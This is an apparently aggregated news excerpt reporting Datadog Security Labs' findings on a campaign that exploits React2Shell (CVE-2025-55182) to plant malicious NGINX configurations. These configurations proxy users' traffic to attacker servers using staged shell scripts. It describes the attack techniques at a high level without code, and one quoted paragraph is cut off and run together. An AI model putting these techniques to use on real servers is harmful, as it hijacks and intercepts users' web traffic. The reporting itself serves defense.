"Datadog Security Labs said it observed threat actors associated with the recent React2Shell ( CVE-2025-55182, CVSS score: 10.0) exploitation using malicious NGINX configurations to pull off the attack. "The malicious configuration intercepts legitimate web traffic between users and websites and routes it through attacker-controlled backend servers," security researcher Ryan Simon said. "The campaign targets Asian TLDs (.in, .id, .pe, .bd, .th), Chinese hosting infrastructure (Baota Panel), and government and educational TLDs (.edu, .gov).""
"zx.sh, which acts as the orchestrator to execute subsequent stages through legitimate utilities like curl or wget. In the event that the two programs are blocked, it creates a raw TCP connection to send an HTTP request bt.sh, which targets the Baota (BT) Management Panel environment to overwrite NGINX configuration files 4zdh.sh, which enumerates common Nginx configuration locations and takes steps to minimize errors when creating the new configuration zdh.sh, which adopts a narrower targeting approach by focusing mainly on Linux or containerized NGINX confi"
Threat actors exploited React2Shell (CVE-2025-55182) to inject malicious NGINX configuration entries that intercept and proxy legitimate web requests through attacker-controlled backend servers. The operation captures incoming requests on predefined URL paths and redirects them using the proxy_pass directive to attacker domains. Targeting focuses on Asian TLDs (.in, .id, .pe, .bd, .th), Chinese hosting infrastructure such as Baota (BT) Panel, and government and educational TLDs (.edu, .gov). The activity uses a multi-stage shell-script toolkit to achieve persistence, enumerate NGINX config locations, overwrite configuration files, and fall back to raw TCP if curl or wget are blocked.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]